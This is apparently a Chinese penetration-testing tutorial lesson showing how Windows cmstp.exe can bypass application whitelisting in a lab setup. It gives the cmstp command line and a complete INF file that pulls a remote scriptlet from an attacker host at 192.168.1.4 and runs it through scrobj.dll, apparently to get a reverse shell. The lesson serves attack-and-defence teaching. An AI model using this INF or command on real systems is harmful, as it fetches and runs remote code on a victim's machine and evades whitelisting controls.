第八十七课：基于白名单Cmstp.exe执行payload第十六季 - 《专注 APT 攻击与防御 - Micro8 系列教程》

靶机执行：
附录：

Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用，则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。

微软官方文档：

说明：Cmstp.exe所在路径已被系统添加PATH环境变量中，因此，Cmstp命令可识别，需注意x86，x64位的Cmstp调用。

Windows 7 默认位置：


C:\Windows\SysWOW64\cmstp.exe

攻击机： 192.168.1.4 Debian
靶机： 192.168.1.119 Windows 7

注：x64 payload

cmstp.exe /ni /s C:\Users\John\Desktop\rev.inf

第八十七课：基于白名单Cmstp.exe执行payload第十六季 - 图1

Micropoor_rev_cmstp_inf：

[version]
Signature=$chicago$
AdvancedINF=2.5 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection 
%11%\scrobj.dll,NI,http://192.168.1.4/cmstp_rev_53_x64.sct 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Micropoor"
ShortSvcName="Micropoor"

Micropoor